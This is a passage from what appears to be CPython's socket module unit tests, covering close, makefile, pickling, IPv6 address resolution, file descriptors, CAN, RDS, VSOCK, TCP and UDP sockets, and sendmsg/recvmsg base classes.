self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
